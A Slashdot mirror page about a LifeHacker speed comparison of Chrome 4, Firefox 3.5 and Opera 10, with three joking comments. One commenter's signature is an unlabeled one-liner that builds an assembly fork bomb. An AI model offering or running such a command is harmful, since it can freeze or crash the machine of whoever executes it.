Slashdot Mirror


Chrome 4.0 Vs. Opera 10 Vs. Firefox 3.5

Jim Karter writes "In a three-way cage match, LifeHacker threw Chrome 4, Firefox 3.5, and Opera 10 into the ring and let the three browsers duke it out to see which would emerge as the fastest app for surfing the web. Quoting: 'Like all our previous speed tests, this one is unscientific, but thorough. We install the most current versions of each browser being tested — in this case, Opera 10, Chrome's development channel 4.0 version, and the final Firefox 3.5 with security fixes — in a system with a 2.0 GHz Intel Centrino Duo processor and 2GB of RAM, running Windows XP.'"

3 of 354 comments (clear)

  1. Re:AdBlock by daveime · · Score: 5, Funny

    Well no shit Sherlock ... how long does it take to render an empty page ?

  2. Re:Memory by whoop · · Score: 5, Funny

    everything just seems fast

    So true. More benchmarking tests need to include seems per second. I mean, come on, it's the 21st century and all! At least, it seems to me they should. That way their reports will seem much more seemingly accurate to what I want them to seem. ... I think.

  3. Re:Safari by Hal_Porter · · Score: 5, Funny

    Back in the old days we used to eat people who did that so that the knowledge they had gained unnaturally could be shared amongst the whole tribe. Now people have gone soft. Still one day the old ways will return.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;